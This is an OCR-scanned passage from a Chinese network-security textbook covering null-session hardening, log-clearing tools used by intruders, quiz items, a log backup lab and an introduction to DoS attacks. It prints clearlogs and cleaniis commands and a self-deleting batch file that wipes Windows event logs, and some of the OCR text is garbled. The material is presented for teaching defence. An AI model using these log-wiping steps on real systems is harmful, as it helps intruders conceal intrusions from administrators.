新 建 Name :AutoShareWks 
Type :DWORD ( 双 字 节 ) 
Value:0 


建立 后 重启 ， 默 认 共享 即 被 删除 。 如 需要 使 用 共享 资源 ， 删 除 刚 才 建 立 的 键 ， 重 启 即 
可 生效 。 

2. 禁止 空 连接 进行 枚 举 攻 击 的 方法 

有 了 IPCS$ 空 连接 作为 连接 基础 ， 入 侵 者 可 以 进行 反复 的 试探 性 连接 ， 直 到 连接 成 功 、 
获取 密码 ， 这 就 为 入 侵 者 暴力 破解 提供 了 可 能 性 ， 被 入 侵 只 是 时 间 问 题 。 为 了 解决 这 个 问 
题 ， 打 开 注 册 表 编辑 器 ， 在 HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\ 
ControlLSA 中 把 Restrict Anonymous=DWORD 的 键 值 改 为 : 00000001( 也 可 以 改 为 2, 不 过 
改 为 2 后 可 能 造成 一 些 服务 不 能 正常 工作 )。 修 改 完毕 重启 计算 机 ， 这 样 便 禁止 了 空 连接 进 
行 枚 举 攻击 。 要 说 明 的 是 ， 这 种 方法 并 不 能 禁止 建立 空 链接 。 现 在 再 使 用 X-Scan 对 计算 机 
进行 安全 检测 ， 便 会 发 现 该 主机 不 再 泄露 用 户 列表 和 共享 列表 ， 操 作 系统 类 型 也 不 会 被 
X-Scan 识别 。 

3. 关闭 Server 服务 


Server 服务 是 IPC$ 和 默认 共享 所 依赖 的 服务 , 如 果 关闭 它 , IPC$ 和 默认 共享 便 不 存在 ， 
但 同时 也 使 服务 器 丧失 其 他 一 些 服务 功能 ， 因 此 该 方法 不 适合 服务 器 使 用 ， 只 适合 个 人 计 
算 机 使 用 。 

选择 “控制 面板 ”一 “管理 工具 ”一 “服务 ”选项 打开 服务 管理 器 ， 在 服务 列表 中 找 
到 Server 服务 ， 单 击 鼠 标 右 键 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 打开 “Server 的 属 
性 ”窗口 ， 然 后 在 该 窗口 中 的 “启动 类 型 ”下 拉 列 表 中 选择 “已 禁用 ”， 重 启 生 效 。 还 可 
使 用 Dos 命令 “net stop server/y” 来 关闭 ， 但 只 能 当前 生效 一 次 ， 计 算 机 重启 后 ，Server 
服务 还 是 会 自动 开启 。 


2.5” 留 后 门 与 清 痕迹 的 防范 方法 


黑客 除了 通过 克隆 账号 留 后 门 外 ， 入 侵 者 还 要 清除 入 侵 痕 迹 ， 主 要 是 清除 系统 日 志 。 

Windows 系统 以 3 种 日 志方 式 记录 重要 事件 。 

(1) 应 用 程序 日 志 ， 包 含 由 应 用 程序 或 系统 程序 记录 的 事件 。 例 如 : 数据 库 程序 可 在 
应 用 日 志 中 记录 文件 错误 ; 程序 开发 人 员 决 定 记 录 哪 一 个 事件 。 

(2) 系统 日 志 ， 包 含 Windows 系统 组 件 记录 的 事件 。 例 如 : 在 启动 过 程 中 将 加 载 的 驱 
动 程序 或 其 他 系统 组 件 的 失败 信息 记录 在 系统 日 志 中 。 

(3) 安全 日 志 ， 可 以 记录 安全 事件 ， 如 有 效 的 和 无 效 的 登录 尝试 ， 以 及 与 创建 、 打 开 
或 删除 文件 等 资源 使 用 相关 联 的 事件 。 

下 面 介 绍 几 种 清除 日 志 的 黑客 工具 。 


1. 清除 系统 日 志 工 具 一 一 clearlog.exe 
使 用 方法 : 


Usage: clearlogs [\computername] <-app / -sec / -sys> 

-app ”应 用 程序 日 志 

-sec ”安全 日 志 

-sys ”系统 日 志 

1) ”清除 远程 计算 机 日 志 

先 用 ipc 连接 net use \ipipc$， 输 入 密码 /user 用 户 名 ， 然 后 开始 清除 。 

方法 : 

clearlogs \ip -app 清除 远程 计算 机 的 应 用 程序 日 志 。 

clearlogs \ip -sec ”清除 远程 计算 机 的 安全 日 志 。 

clearlogs \ip -sys ”清除 远程 计算 机 的 系统 日 志 。 

2) ”清除 本 机 日 志 

如 果 和 远程 计算 机 不 能 建立 空 连接 。 则 需要 把 这 个 工具 传 到 远程 计算 机 上 , 然后 清除 。 

方法 : 

clearlogs -app 清除 远程 计算 机 的 应 用 程序 日 志 。 

clearlogs -sec 清除 远程 计算 机 的 安全 日 志 。 

clearlogs —sys 清除 远程 计算 机 的 系统 日 志 。 

为 了 更 安全 一 点 ， 可 以 建立 一 个 批 处 理 文件 ， 用 at 命令 建立 一 个 计划 任务 ， 让 其 自动 
运行 ， 达 到 自动 清除 的 目的 。 

例如 建立 一 个 cbat: 


@echo off 
clearlogs -app 
clearlogs -sec 
clearlogs -sys 
del clearlogs.exe 


del c.bat 


在 用 户 的 计算 机 上 测试 的 时 候 ， 不 要 @echo off， 也 可 以 看 到 结果 。 
第 一 行 表 示 : 运行 时 不 显示 窗口 。 
第 二 行 表 示 : 清除 应 用 程序 日 志 。 
第 三 行 表 示 : 清除 安全 日 志 。 
第 四 行 表 示 : 清除 系统 日 志 。 
第 五 行 表 示 : 删除 clearlogs.exe 这 个 工具 。 
六 行 表示 : 删除 cbat 这 个 批 处 理 文件 。 
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第 七 行 表 示 : 退出 。 

用 at 命令 ， 建 立 一 个 计划 任务 。 

at 时 间 cic.bat 之 后 就 可 以 安全 离开 了 。 
2. 清除 iis 日 志 工具 一 一 cleaniis.exe 


使 用 方法 : 


iisantidote <logfile dir> <ip or string to hide> 
iisantidote <logfile dir><ip or string to hide> stop 
stop opiton will stop iis before clearing the files and restart it after 


<logfile dir> exemple : c:winntsystem32logfilesw3svcl1 dont forget the 


使 用 说 明 ， 例 如 : 

cleaniis c:winntsystem32logfilesw3svcl 192.168.0.1 表示 清除 log 中 所 有 此 IP(192.168.0.1) 
地 址 的 访问 记录 。 

cleaniis c:winntsystem32logfilesw3svcl/shop/admin/ ”表示 清除 这 个 目录 里 面 所 有 日 志 。 

c:wWinntsystem32logfilesw3svcl ”代表 是 iis 日 志 的 位 置 (Windows nt/2000)， 这 个 路 径 可 
以 改变 。 

c:windowssystem32logfilesw3svcl ”代表 是 iis 日 志 的 位 置 (Windows xp/2003), 这 个 路 径 
也 可 以 改变 。 

同样 这 个 也 可 以 建立 批 处 理 ， 方 法 与 前 面相 同 。 

3. 清除 历史 记录 及 运行 日 志 的 工具 一 一 cleaner.exe 

这 个 工具 直接 运行 就 可 以 。 

对 于 网 络 用 户 而 言 ， 及 时 发 现 漏洞 和 入 侵 是 网 络 安全 防护 的 首要 任务 。 但 是 黑客 一 旦 
清除 了 日 志文 件 ， 对 于 一 般 网 络 用 户 而 言 是 难以 发 现 的 ， 因 此 建议 采取 以 下 策略 提高 网 络 
的 自主 防护 能 力 。 

(1) 保护 本 地 安全 策略 。 

@ 系统 关闭 时 删除 所 有 临时 文件 ， 启 动 时 利用 杀毒 软件 检查 重要 的 系统 文件 。 

@ ”实施 用 户 账户 封锁 策略 。 

@ 正确 配置 用 户 权限 将 阻止 恶意 系统 用 户 访问 其 他 用 户 文 件 。 

(2) 保护 系统 文件 和 目录 权限 ， 可 以 有 效 地 保护 日 志文 件 ， 从 而 使 未 授权 用 户 不 能 访 
问 这 些 文件 夹 。 

(3) 限制 空 连接 ， 保 护 共 享 文件 ， 可 以 通过 启用 防火 墙 监视 网 络 连接 情况 。 

(4) 禁用 不 必要 的 服务 。 


小 结 
章 主要 介绍 了 黑客 的 由 来 、 黑 客 行为 的 发 展 趋势 ,系统 介绍 了 黑客 攻击 事件 的 分 类 ， 


全 面 介绍 了 黑客 攻击 常用 的 手段 。 通 过 本 章 的 学 习 ， 学 生 可 以 了 解 有 关 黑 客 的 相关 知识 ， 
掌握 常用 的 网 络 攻击 与 防范 的 方法 ， 同 时 提高 网 络 安全 意识 ， 并 自觉 维护 网 络 安全 。 


一 、 选 择 题 
1. 在 Apache 服 务 器 配置 过 程 中 ,在 Httpd.conf 文 件 中 的 某 行 前 加 # 意 味 着 这 行 ( 乱 
A. 不 显示 B. 不 执行 
C. 不 首先 执行 D. 无 意思 
2. 对 入 侵 检测 设备 的 作用 认识 比较 全 面 的 是 (  )。 
A. 只 要 有 IDS 网 络 就 安全 了 
B. 只 要 有 配置 好 的 IDS 网 络 就 安全 了 
C.IDS 一 无 是 处 
D. IDS 不 能 百分之百 的 解决 所 有 问题 
3. ”以 下 哪 项 不 是 漏洞 扫描 的 主要 任务 ( 下 


A. 查看 错误 配置 B. 弱 口 令 检测 
C. 发 现 网 络 攻击 D. 发 现 软件 安全 漏洞 
4. 我 们 在 使 用 Honeynet 技术 过 程 中 要 着 重 保护 ( 。 )。 
A. 设备 B. 网 络 
C. 系统 日 志 D. 数据 
5. 如 果 要 使 sniffer 能 够 正常 抓 取 数据 ， 一 个 重要 的 前 提 是 网 卡 要 设置 成 ( ) 模 式 。 
A. 广播 B. 共享 
C. 混杂 D. 交换 
6. DNS 欺骗 主要 是 利用 了 DNS 的 (  ) 功 能 。 
A. 解析 查询 B. 递归 查询 
C. 条 件 查 询 D. 循环 查询 


7. 缓存 区 溢出 和 格式 化 字符 串 攻击 主要 是 由 于 ( ”) 原 因 造 成 的 。 
A. 被 攻击 平台 主机 档次 较 差 
B. 分 布 式 DOS 攻击 造成 系统 资源 耗 尽 
C. 被 攻击 系统 没有 安装 必要 的 网 络 设备 
D. 由 于 编程 人 员 在 编写 程序 过 程 中 书写 不 规范 造成 的 
8. ”对 于 查 杀 病毒 ， 下 列 哪 项 做 法 欠 受 (  )。 
A. 升级 杀毒 软件 的 版 本 
B. 加 装 多 个 杀毒 软件 
C. 进行 系统 格式 化 
D. 在 DOS 下 查 杀 病 毒 
二 、 填 空 题 
目前 入 侵 检 测 器 与 分 析 器 之 间 的 通信 有 两 种 方式 : 和 
2.， 在 缓存 区 溢出 攻击 中 ， 修 改 程序 流 的 方法 有 


ji 


(> i 和 机 网络 安全 


- 堂 洲 若 煌 竹 “十 泣 并 从 峰 林 巴 强 也 


于 目 前 流行 的 木 马 传播 方式 有 


4. 在 正常 情况 下 ， 网 卡 只 响应 两 补 关 型 的 孝 据 村 和 
5. 扫描 是 通 过 向 目标 主机 发 送 数 据 报 广 ， 然后 根据 响应 获得 目标 主机 的 情况 ， 常 见 
的 扫描 类 型 有 
6. 我 们 常用 的 防止 ARP 其 六 的 方法 有 
和 等 这 几 种 。 


实 训 “日 志 的 防护 


1. 实验 目的 
通过 日 志 的 管理 ， 熟 悉 如何 通 过 日 志 了 解 到 系统 的 安全 性 能 ， 了 解 黑 客 在 入 侵 成 功 后 
如 何 清 除 日 志 。 


2. 实验 内 容 


(1) 日 志 的 安全 配置 。 
(2) 日 志 的 查询 与 备份 。 


3. 实验 步骤 


(1) 日 志 的 安全 配置 。 

默认 的 条 件 下 , 日 志 的 大 小 为 S12KB， 如 果 超 出 则 会 报错 ， 并 且 不 会 再 记录 任何 日 志 。 
所 以 首要 任务 是 更 改 默认 大 小 。 

更 改 默认 大 小 的 具体 方法 :注册 表 中 HKEY _ LOCAL MACHINE\System\CurrentControlSet\ 
Services\Eventlog 对 应 的 每 个 日 志 如 系统 、 安 全 、 应 用 程序 等 均 有 一 个 maxsize 子 键 ， 修 改 
即 可 。 

下 面 给 出 来 自 微软 站 点 的 - -个 脚本 ， 利 用 VMI 来 设 定 日 志 最 大 为 23MB， 并 允许 日 志 
自行 履 盖 14 天 前 的 日 志 。 该 脚本 利用 的 是 WMI 对 象 ，WMI(Windows Management 
Instrumentation) 技 术 是 微软 提供 的 Windows 下 的 系统 管理 工具 。 通 过 该 工具 可 以 获得 本 地 
或 管理 客户 端 系统 中 几乎 全 部 信息 。 很 多 专业 的 网 络 管理 工具 都 是 基于 WMI 开发 的 。 该 
工具 在 Win2000 以 及 WinNT 下 是 标准 工具 。 以 下 代码 在 Win2000 系统 均 可 运行 。 


strComputer = "." 
Set objWMIService = GetObject ("winmgmts:" _ 
& "{impersonationLevel=impersonate, (Security)}!\\" & 
strComputer & "\root\cimv2") "获得 VMI 对 象 
Set colLogFiles = objWMIService.ExecQuery _ 
("Select * from Win32_NTEventLogFile") 
For each objLogfile in colLogFiles 
strLogFileName = objLogfile.Name 
Set wmiSWbemObject = GetObject _ 


("winmgmts: {impersonationLevel=Impersonate}!\\.\root\cimv2:" _ 
& "Win32 NTEventlogFile.Name='" & strLogFileName & "'") 
wmiSWbemObject .MaxFileSize = 2500000000 
wmiSWbemObject .OverwriteOutdated = 14 
wmiSWbemObject .Put_ 
Next 
将 上 述 脚本 用 记事 本 存盘 为 后 缕 名 为 vbs 即 可 使 用 。 
另外 需要 说 明 的 是 代码 中 的 strComputer="." 在 Windows 脚本 中 的 含义 相当 于 localhost， 
如 果 要 在 远程 主机 上 执行 代码 ， 只 需要 把 "." 改 动 为 主机 名 ， 当 然 首先 得 拥有 对 方 主 机 的 管 
理 员 权限 并 建立 IPC 连接 ， 本 文中 的 代码 所 出 现 的 strComputer 均 可 作 如 此 改动 。 
(2) 日 志 的 查询 与 备份 。 
一 个 优秀 的 管理 员 应 该 养 成 备份 日 志 的 习惯 ， 如 果 有 条 件 的 话 ， 还 应 该 把 日 志 转 存 到 
备份 机 器 上 或 直接 转 储 到 打印 机 上 , 在 这 里 推荐 微软 的 resourceKit 工具 箱 中 的 dumpel.exe。 
使 用 方法 : 
dumpel -f filename -s \\server -1 log 
-£ filename 输出 日 志 的 位 置 和 文件 名 
-s \\server 输出 远程 计算 机 日 志 
-1 log log 是 system，security，application， 也 可 为 DNS 等 。 


如 要 把 目标 服务 器 server 上 的 系统 日 志 转 存 为 backupsystem.log， 可 以 用 以 下 格式 : 
dumpel \\server -1 system -上 backupsystem.1og 
再 利用 计划 任务 实现 定期 备份 系统 日 志 。 


另外 利用 脚本 编程 的 VMI 对 象 也 能 轻而易举 的 实现 日 志 备 份 。 
下 面 给 出 备份 application 日 志 的 代码 : 


backuplog.vbs 
strComputer = "." 
Set objWMIService = GetObject ("winmgmts:" _ 
& "{impersonationLevel=impersonate, (Backup)}!\\"& _ 
strComputer & "\root\cimv2") ' 获 得 VMI 对 象 
Set colLogFiles = objWMIService.ExecQuery _ 
("Select * from Win32 NTEventLogFile where 
LogFileName='Application'") “获取 日 志 对 象 中 的 应 用 程序 日 志 
For Each objLogfile in colLogFiles 
errBackupLog= objLogFile.BackupEventLog("f:\application.evt") ' 将 日 
志 备 份 为 £:\application.evt 
If errBackupLog <> 0 Then Wscript.Echo "The Application event log could not 


be backed up." 
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else Wscript.Echo "success backup log" 


End If 
Next 
程序 说 明 : 如 果 备份 成 功 窗口 提示 为 “success backup log”, 否则 提示 “The Application 
event log could not be backed up”, 此 处 备份 的 日 志 名 为 application, 备份 位 置 为 f\application.evt， 
可 以 自行 修改 ， 此 处 备份 的 格式 为 evt 的 原始 格式 ， 用 记事 本 打开 则 为 乱码 。 
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【本 章 要 点 】 
本 章 主 要 介绍 常见 的 攻击 类 型 一 一 拒绝 服务 攻击 以 及 数据 库 安全 方面 的 相关 内 容 。 通 
过 本 章 的 学 习 ， 可 以 掌握 拒绝 服务 攻击 的 概念 及 原理 、 常 见 的 DoS 攻击 种 类 及 防护 、 基 于 
漏洞 入 侵 的 防护 方法 、SQL 数据 库 安全 原理 及 SQL Server 攻击 的 防护 等 相关 内 容 。 


3.1 拒绝 服务 攻击 概述 


随 着 Internet 互联 网 络 带宽 的 增加 和 多 种 DoS 黑客 工具 的 不 断 发 布 ，DoS 拒绝 服务 攻 
击 的 实施 越 来 越 容易 ，DoS 攻击 事件 正在 呈 上 升 趋势 。 出 于 商业 竞争 、 打 击 报复 和 网 络 敲 
诈 等 多 种 因素 ， 导 致 很 多 IDC 托管 机 房 、 商 业 站 点 、 游 戏 服务 器 和 聊天 网 络 等 网 络 服 务 商 
长 期 以 来 一 直 被 Dos 攻击 所 困扰 ， 随 之 而 来 的 是 客户 投诉 、 同 虚拟 主机 用 户 受 牵连 、 法 律 
纠纷 和 商业 损失 等 一 系列 问题 ， 因 此 ， 解 决 Dog 攻击 的 问题 成 为 网 络 服务 商 必须 考虑 的 
事情 。 


3.1.1 DoS 定义 


拒绝 服务 攻击 ， 英 文 为 “Denial of Service”， 也 就 是 我 们 常 说 的 DoS。Dos 是 借助 
网 络 服务 器 的 安全 漏洞 实现 破坏 该 服务 器 的 正常 运行 , 利用 虚假 他 地 址 周期 性 地 向 网 络 服 
务 器 发 出 正常 的 服务 请 求 ， 进 而 过 量 占用 系统 的 服务 资源 ， 最 终 导致 合法 的 网 络 用 户 无 法 
获得 其 所 需要 的 信息 服务 。 拒 绝 服务 器 DoS 攻击 的 对 象 是 Intermet 站 点 ， 对 大 部 分 网 站 的 
攻击 ， 并 未 入 侵 主 机 系统 ， 也 没有 获取 其 中 资料 ， 而 是 利用 分 散在 不 同 地 方 的 多 台 计算 机 ， 
发 送 大量 伪 造 源 地 址 人 P 包 ， 使 受害 者 所 在 的 网 络 主机 瘫痪 ， 接 通 率 降 到 零 以 下 ， 使 服务 器 
无 法 对 正常 的 使 用 者 提供 服务 。 

DoS 攻击 的 基本 过 程 : 首先 攻击 者 向 服务 器 发 送 众多 的 带 有 虚假 地 址 的 请 求 ， 服 务 器 
发 送 回复 信息 后 等 待 回 传 信息 ， 由 于 地 址 是 伪造 的 ， 所 以 服务 器 一 直 等 不 到 回 传 的 消息 ， 
分 配给 这 次 请 求 的 资源 就 始终 没有 被 释放 。 当 服务 器 等 待 一 定 的 时 间 后 ， 连 接 会 因 超时 而 
被 切断 ， 攻 击 者 会 再 度 传送 新 的 一 批 请 求 ， 在 这 种 反复 发 送 伪 地 址 请 求 的 情况 下 ， 服 务 器 
资源 最 终 会 被 耗 尽 ， 从 而 导致 服务 器 服务 中 断 。 如 图 3-1 所 示 。 


受害 者 

L_ 儿 带 有 谋 假 地 址 的 请 求 

yy 

LE gi 
le 

| 
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( 
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3.1.2 ”拒绝 服务 攻击 的 分 类 


近 些 年 来 ， 随 着 人 们 不 断 加 强 对 DoS 的 防御 ， 设 计 出 各 种 应 对 DoS 攻击 的 技术 手段 ， 
同时 ，Dos 攻击 的 手段 也 在 不 断 地 变化 、 增 多 ， 即 使 是 同一 种 攻击 方式 ， 攻 击 者 改变 某 些 
攻击 特征 ， 就 可 以 躲 过 某 些 防御 措施 ， 从 而 衍生 出 各 种 各 样 的 DoS 攻击 模式 。 这 些 问 题 ， 
一 方面 阻碍 了 研究 者 对 攻击 现象 与 特征 的 深入 理解 ， 另 一 方面 ， 也 对 人 们 根据 攻击 特征 的 
异同 来 实施 不 同 的 防御 手段 ， 并 对 防御 措施 的 有 效 性 进行 评估 带 来 了 困难 。 

如 果 了 解 了 攻击 者 可 以 采取 的 攻击 类 型 ， 就 可 以 有 针对 性 地 应 对 这 些 攻 击 。 而 对 拒绝 
服务 攻击 的 分 类 研究 则 是 深入 了 解 拒绝 服务 攻击 的 有 效 途径 。 因此， 本 节 讨 论 对 拒绝 服务 
攻击 的 分 类 。 

拒绝 服务 攻击 的 分 类 方法 有 很 多 种 ， 从 不 同 的 角度 可 以 进行 不 同 的 分 类 ， 而 不 同 的 应 
用 场合 需要 采用 不 同 的 分 类 。 

(1) 拒绝 服务 攻击 可 以 是 物理 的 (硬件 的 ), 也 可 以 是 逻辑 的 (Logic Attack), 也 称 为 软件 
的 (Software Attack)。 物 理 形式 的 攻击 如 偷窃 、 破 坏 物理 设备 ， 破 坏 电 源 等 。 物 理 攻击 属于 
物理 安全 的 范围 ， 不 在 本 书 的 讨论 之 列 。 本 书 中 只 讨论 后 一 种 形式 的 攻击 。 

(2) 按 攻 击 的 目标 又 可 分 为 结 点 型 和 网 络 连接 型 ， 前 者 旨 在 消耗 结 点 (主机 Host) 资 源 ， 
后 者 旨 在 消耗 网 络 连接 和 带宽 。 而 结 点 型 又 可 以 进一步 细 分 为 主机 型 和 应 用 型 ， 主 机 型 攻 
击 的 目标 主要 是 主机 中 的 公共 资源 如 CPU、 磁 盘 等 ， 使 得 主机 对 所 有 的 服务 都 不 能 响应 ; 
而 应 用 型 则 是 攻击 特定 的 应 用 ， 如 邮件 服务 、DNS 服务 、Web 服务 等 。 受 攻击 时 ， 受 害 者 
上 的 其 他 服务 可 能 不 受 影 响 或 者 受 影响 的 程度 较 小 (与 受 攻击 的 服务 相 比 而 言 )。 

(3) 按照 攻击 方式 来 分 可 以 分 为 : 资源 消耗 、 服 务 中 止 和 物理 破坏 。 资 源 消耗 指 攻击 
者 试图 消耗 目标 的 合法 资源 ， 例 如 网 络 带 宽 、 内 存 和 磁盘 空间 、CPU 使 用 率 等 。 服 务 中 止 
则 是 指 攻击 者 利用 服务 中 的 某 些 缺 陷 导 致 服务 崩溃 或 中 止 。 物 理 破坏 则 是 指 雷击 、 电 流 、 
水 火 等 物理 接触 的 方式 导致 的 拒绝 服务 攻击 。 

(4) 按 受 害 者 类 型 可 以 分 为 服务 器 端 拒绝 服务 攻击 和 客户 端 拒绝 服务 攻击 。 前 者 是 指 
攻击 的 目标 是 特定 的 服务 器 ， 使 之 不 能 提供 服务 (或 者 不 能 向 某 些 客户 端 提供 某 种 服务 )， 
例如 攻击 一 个 Web 服务 器 使 之 不 能 被 访问 ; 后 者 是 针对 特定 的 客户 端 即 用 户 ， 使 之 不 能 使 
某 种 服务 ， 例 如 游戏 和 聊天 室 中 的 “ 踢 人 ”， 即 不 让 某 个 特定 的 用 户 登 录 游戏 系统 或 聊 
天 室 中 ， 使 之 不 能 使 用 系统 的 服务 。 大 多 数 的 拒绝 服务 攻击 (无 论 从 种 类 还 是 发 生 的 频率 角 
度 ) 是 针对 服务 器 的 ， 针 对 客户 端的 攻击 一 般 发 生 的 少 些 ， 同 时 因为 涉及 面 小 ， 其 危害 也 会 
小 很 多 。 

(5) 按 攻 击 是 否 直 接 针对 受害 者 ， 可 以 分 为 直接 拒绝 服务 攻击 和 间接 拒绝 服务 攻击 ， 
如 要 对 某 个 E-mail 账号 实施 拒绝 服务 攻击 , 直接 对 该 账号 用 邮件 炸弹 攻击 就 属于 直接 攻击 。 
为 了 使 某 个 邮件 账号 不 可 用 ， 攻 击 邮 件 服务 器 而 使 整个 邮件 服务 器 不 可 用 就 是 间接 攻击 。 

(6) 按 攻击 地 点 可 以 分 为 本 地 攻击 和 远程 网络) 攻击 ， 本 地 攻击 是 指 不 通过 网 络 ， 直 
接 对 本 地 主机 的 攻击 ， 远 程 攻击 则 必须 通过 网 络 连接 。 由 于 本 地 攻击 要 求 攻击 者 与 受害 者 
处 于 同一 地 ， 这 对 攻击 者 的 要 求 太 高 ， 通 常 只 有 内 部 人 员 能 够 做 到 。 同 时 ， 本 地 攻击 通常 
可 以 通过 物理 安全 措施 以 及 对 内 部 人 员 的 严格 控制 予以 解决 。 
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3.1.3 常见 DoS 攻击 


攻击 者 进行 拒绝 服务 攻击 ， 实 际 上 是 让 服务 器 实现 两 种 效果 : 一 是 迫使 服务 器 的 缓冲 
区 满 ， 不 接收 新 的 请 求 ， 二 是 使 用 他 欺骗 ， 迫 使 服务 器 把 合法 用 户 的 连接 复位 ， 影 响 合法 


用 户 的 连接 。 


拒绝 服务 攻击 是 一 种 对 网 络 危 害 巨 大 的 恶意 攻击 。 今 天 ，DoS 具有 代表 性 的 攻击 手段 


包括 SYN flood、 卫 欺 驴 DoS、Ping of Death、TearDrop、UDP flood 、Land Attack、Smurf 


等 。 我 们 看 看 它们 又 是 怎么 实现 的 。 
1. SYN 洪水 ( SYN flood ) 


SYN flood 是 当前 最 流行 的 DoS( 拒 绝 服务 攻击 ) 与 DDoS( 分 布 式 拒绝 服务 攻击 ) 的 方式 
之 一 ， 这 是 一 种 利用 TCP 协议 缺陷 ， 发 送 大 量 伪造 的 TCP 连接 请 求 ， 从 而 使 得 被 攻击 方 


资源 耗 尽 (CPU 满 负 荷 或 内 存 不 足 ) 的 攻击 方式 。 


SYN flood 攻击 的 过 程 在 TCP 协议 中 被 称 为 三 次 握手 ， 而 SYN flood 拒绝 服务 攻击 就 


是 通过 三 次 握手 来 实现 的 。 


(1) 攻击 者 向 被 攻击 服务 器 发 送 一 个 包含 SYN 标识 的 TCP 报 文 ，SYN 即 同步 报 文 。 
同步 报 文 会 指明 客户 端 使 用 的 端口 以 及 TCP 连接 的 初始 序号 , 这 时 同 被 攻击 服务 器 建立 了 


第 一 次 握手 。 


(2) 被 攻击 服务 器 在 收 到 攻击 者 的 SYN 报 文 后 ， 将 返回 一 个 SYN+ACK 的 报 文 ， 表 
示 攻 击 者 的 请 求 被 接受 ， 同 时 TCP 序号 被 加 一 。ACK 即 确认 ， 这 样 就 同 被 攻击 服务 器 建 


立 了 第 二 次 握手 。 
(3) 攻击 者 也 返回 一 个 确认 报 文 ACK 给 被 攻击 服务 器 ， 同 样 TCP 序号 被 加 一 ， 
一 个 TCP 连接 完成 ， 三 次 握手 完成 。 


到 此 


具体 原理 是 : 在 TCP 连接 的 三 次 握手 中 ， 假 设 一 个 用 户 向 服务 器 发 送 了 SYN 报 文 后 
突然 死机 或 掉 线 ， 那 么 服务 器 在 发 出 SYN+ACK 应 答 报 文 后 是 无 法 收 到 客户 端的 ACK 报 
文 的 (第 三 次 握手 无 法 完成 )， 这 种 情况 下 服务 器 端 一 般 会 重 试 (再 次 发 送 SYN+ACK 给 客户 


端 ) 并 等 待 一 段 时 间 后 丢弃 这 个 未 完成 的 连接 ， 这 段 时 间 的 长 度 被 称 为 SYN Timeout， 


一 般 


来 说 这 个 时 间 是 分 钟 的 数量 级 (大 约 为 30 秒 一 2 分 钟 )， 一 个 用 户 出 现 异 常 导致 服务 器 的 一 


个 线程 等 待 1 分 钟 并 不 是 什么 很 大 的 问题 , 但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 这 种 
服务 器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 列 表 而 消耗 非常 多 的 资源 一 一 数 以 万 计 和 


情况 ， 
4 半 连 


接 ,， 即使 是 简单 的 保存 并 遍历 也 会 消耗 非常 多 的 CPU 时 间 和 内 存 , 何况 还 要 不 断 对 这 个 列 


表 中 的 他 进行 SYN+ACK 的 重 试 。 实 际 上 如 果 服 务 器 的 TCP/IP 栈 不 够 强大 ， 最 后 


4 结果 


往往 是 堆栈 溢出 崩溃 一 一 即使 服务 器 端的 系统 足够 强大 ， 服 务 器 端 也 将 忙于 处 理 攻击 者 伪 
造 的 TCP 连接 请 求 而 无 暇 理 妈 客户 的 正常 请 求 (毕竟 客户 端的 正常 请 求 比率 非常 之 小 )， 此 
时 从 正常 客户 的 角度 看 来 ,服务器 失去 响应 ， 这 种 情况 被 称 作 “服务 器 端 受到 了 SYN flood 


攻击 (SYN 洪水 攻击 )”。 
2. IP 欺骗 DoS 


这 种 攻击 利用 RST 位 来 实现 。 假 设 现在 有 一 个 合法 用 户 (61.61.61.61) 已 经 同 服务 器 建 


@ 
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立 了 正常 的 连接 ， 攻 击 者 构造 攻击 的 TCP 数据 ,伪装 自己 的 下 为 : 61.61.61.61， 并 向 服务 
器 发 送 一 个 带 有 RST 位 的 TCP 数据 段 。 服 务 器 接收 到 这 样 的 数据 后 ， 认 为 从 61.61.61.61 
发 送 的 连接 有 错误 ， 就 会 清空 缓冲 区 中 建立 好 的 连接 。 这 时 ， 如 果 合 法 用 户 61.61.61.61 再 
发 送 合法 数据 ， 服 务 器 就 已 经 没有 这 样 的 连接 了 ， 该 用 户 就 必须 重新 开始 建立 连接 。 攻 击 
时 ， 攻 击 者 会 伪造 大 量 的 瑟 地 址 ， 向 目标 发 送 RST 数据 ， 使 服务 器 不 对 合法 用 户 服务 ， 
从 而 实现 了 对 受害 服务 器 的 拒绝 服务 攻击 。 

3. 死亡 之 Ping (Ping of Death ) 


ICMP 在 Intemet 上 用 于 错误 处 理 和 传递 控制 信息 。 它 的 功能 之 一 是 与 主机 联系 ， 通 过 
发 送 一 个 “回音 请 求 ”(echo request) 信 息 包 看 看 主机 是 否 “ 活 着 ”。 最 普通 的 ping 程序 就 
是 这 个 功能 。 而 在 TCP/IP 的 RFC 文档 中 对 包 的 最 大 尺寸 都 有 严格 限制 规定 ， 许 多 操作 系 
统 的 TCP/IP 协议 栈 都 规定 ICMP 包 大 小 为 64KB， 且 在 对 包 的 标题 头 进行 读 取 之 后 ， 要 根 
据 该 标题 头 里 包含 的 信息 来 为 有 效 载荷 生成 缓冲 区 。Ping of Death 就 是 故意 产生 畸形 的 测 
试 Ping(Packet Internet GropeD 包 ， 声 称 自己 的 尺寸 超过 ICMP 上 限 ， 也 就 是 加 载 的 尺寸 超 
过 64KB 上 限 , 使 未 采取 保护 措施 的 网 络 系统 出 现 内 存 分 配 错误 , 导 臻 TCP/IP 协议 栈 崩溃 ， 
最 终 会 造成 接收 方 主机 死机 。 

4. 泪 滴 ( TearDrop) 攻击 

泪 滴 攻击 利用 在 TCP/IP 协议 栈 实现 中 信任 正 碎片 中 的 包 的 标题 头 所 包含 的 信息 来 实 
现 自己 的 攻击 。IP 分 段 含 有 指示 该 分 段 所 包含 的 是 原 包 的 哪 一 段 的 信息 , 某 些 TCP/IP 协议 
栈 (例如 : NT 在 service pack 4 以 前 ) 在 收 到 含有 重 登 偏 移 的 伪造 分 段 时 将 月 涡 。UDP 洪 
水 (UDP flood) : 如 今 在 Intemet 上 UDP( 用 户 数据 包 协 议 ) 的 应 用 比较 广泛 ， 很 多 的 提供 
WWW 和 Mail 等 服务 设备 通常 是 使 用 UNIX 的 服务 器 , 它们 默认 打开 一 些 被 黑客 恶意 利用 
的 UDP 服务 。 如 echo 服务 会 显示 接收 到 的 每 一 个 数据 包 ， 而 原本 作为 测试 功能 的 chargen 
服务 会 在 收 到 每 一 个 数据 包 时 随机 反馈 一 些 字符 .UDP flood 假冒 攻击 就 是 利用 这 两 个 简单 
的 TCP/IP 服务 的 漏洞 进行 恶意 攻击 ， 通 过 伪造 与 某 一 主机 的 Chargen 服务 之 间 的 一 次 
